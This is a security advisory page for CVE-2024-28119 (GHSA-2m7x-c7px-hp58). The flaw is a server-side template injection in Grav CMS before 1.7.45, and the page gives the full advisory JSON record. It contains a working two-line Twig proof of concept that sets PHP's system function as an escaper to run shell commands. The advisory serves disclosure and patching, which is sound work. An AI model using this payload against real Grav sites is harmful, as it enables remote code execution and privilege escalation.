GHSA-2M7X-C7PX-HP58

Vulnerability from github – Published: 2024-03-22 16:56 – Updated: 2025-01-03 16:07
VLAI?
Summary
Server Side Template Injection (SSTI) via Twig escape handler
Details

Summary

Due to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.

Details

https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99

/**
     * Defines a new escaper to be used via the escape filter.
     *
     * @param string   $strategy The strategy name that should be used as a strategy in the escape call
     * @param callable $callable A valid PHP callable
     */
    public function setEscaper($strategy, callable $callable)
    {
        $this->escapers[$strategy] = $callable;
    }
 ```
 Twig supports the functionality to redefine the escape function through the setEscaper method. 
However, that method is not originally exposed to the twig environment, but it is accessible through the payload below.

```plaintext
{{ grav.twig.twig.extensions.core.setEscaper('a','a') }}

At this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function.

PoC

{{ var_dump(grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter')) }}
{{ var_dump(['id'] | escape('system', 'system')) }}

Impact

Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.45"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28119"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-22T16:56:02Z",
    "nvd_published_at": "2024-03-21T22:15:12Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.\n\n### Details\nhttps://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99\n```php\n/**\n     * Defines a new escaper to be used via the escape filter.\n     *\n     * @param string   $strategy The strategy name that should be used as a strategy in the escape call\n     * @param callable $callable A valid PHP callable\n     */\n    public function setEscaper($strategy, callable $callable)\n    {\n        $this-\u003eescapers[$strategy] = $callable;\n    }\n ```\n Twig supports the functionality to redefine the escape function through the setEscaper method. \nHowever, that method is not originally exposed to the twig environment, but it is accessible through the payload below.\n\n```plaintext\n{{ grav.twig.twig.extensions.core.setEscaper(\u0027a\u0027,\u0027a\u0027) }}\n```\nAt this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function.\n\n\n### PoC\n```\n{{ var_dump(grav.twig.twig.extensions.core.setEscaper(\u0027system\u0027,\u0027twig_array_filter\u0027)) }}\n{{ var_dump([\u0027id\u0027] | escape(\u0027system\u0027, \u0027system\u0027)) }}\n```\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.",
  "id": "GHSA-2m7x-c7px-hp58",
  "modified": "2025-01-03T16:07:19Z",
  "published": "2024-03-22T16:56:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28119"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    },
    {
      "type": "WEB",
      "url": "https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Server Side Template Injection (SSTI) via Twig escape handler"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.